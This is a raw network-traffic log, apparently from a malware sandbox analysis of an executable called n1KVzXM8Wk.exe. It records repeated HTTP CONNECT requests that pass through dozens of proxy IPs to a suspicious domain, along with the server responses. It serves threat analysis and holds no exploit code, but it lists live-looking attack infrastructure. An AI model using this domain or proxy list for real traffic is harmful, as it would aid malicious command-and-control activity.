                                                                                                      1972192.168.2.455393104.244.75.78315346812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.786144018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1973192.168.2.454850195.138.73.54440176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.786737919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.273566008 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1974192.168.2.455356139.159.176.14780906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.798631907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.124541998 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.16.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1975192.168.2.455427104.17.66.69806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.798660040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.885665894 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1976192.168.2.455400147.182.195.54307276812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.823527098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1977192.168.2.45534736.64.238.8210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.823728085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1978192.168.2.455442202.159.60.654436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.844060898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1979192.168.2.45544441.86.252.914436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.844145060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1980192.168.2.4553885.44.42.82108086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.887295961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1981192.168.2.455431184.170.248.541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.887635946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1982192.168.2.45546243.153.81.604436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.887851954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1983192.168.2.45540977.21.78.4481186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.908740997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.443921089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.147296906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.537828922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.089448929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.247124910 CET132INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1984192.168.2.45540545.11.95.16560316812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.911647081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.475183010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.178549051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.475722075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.975440979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.475202084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.975019932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.975059986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.974917889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1985192.168.2.455216134.122.5.111312756812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.911670923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.975181103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.975377083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1986192.168.2.455383183.88.212.16741536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.928682089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1987192.168.2.454851203.112.223.12656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.963376045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1988192.168.2.455387106.14.249.8180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.964303017 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1989192.168.2.45521772.167.220.208282496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.964869022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.975155115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.975369930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1990192.168.2.45542263.250.52.8281186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.965034962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.220562935 CET207INHTTP/1.1 400 Bad request
                                                                                                      Content-length: 90
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1991192.168.2.453934164.92.86.113641106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.975050926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.975301981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.975373030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1992192.168.2.455471218.145.131.1824436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.990045071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1993192.168.2.453924162.214.165.203806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.992481947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178221941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.178492069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1994192.168.2.4551881.27.226.21080606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.995887041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1995192.168.2.455435162.215.223.76546236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.996097088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557645082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.147304058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.348067999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.504929066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581625938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1996192.168.2.453859208.87.131.151442886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.000608921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.475241899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.975264072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084259987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.975174904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1997192.168.2.455402222.255.238.159806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.000802994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.339838982 CET506INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Location: https://ktxcomay.com.vn
                                                                                                      Content-Length: 314
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1998192.168.2.45542027.75.148.5210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.015396118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1999192.168.2.455416219.243.212.11810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.027580976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2000192.168.2.455464107.180.101.226515266812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.055954933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557579041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.147156954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147207975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.037771940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2001192.168.2.455473167.71.18.7580006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.055957079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147661924 CET19INHTTP/1.0 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2002192.168.2.45545745.11.95.16660066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.210062981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.392298937 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2003192.168.2.455496202.159.60.654436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.299269915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2004192.168.2.45546937.187.91.192176056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.299771070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
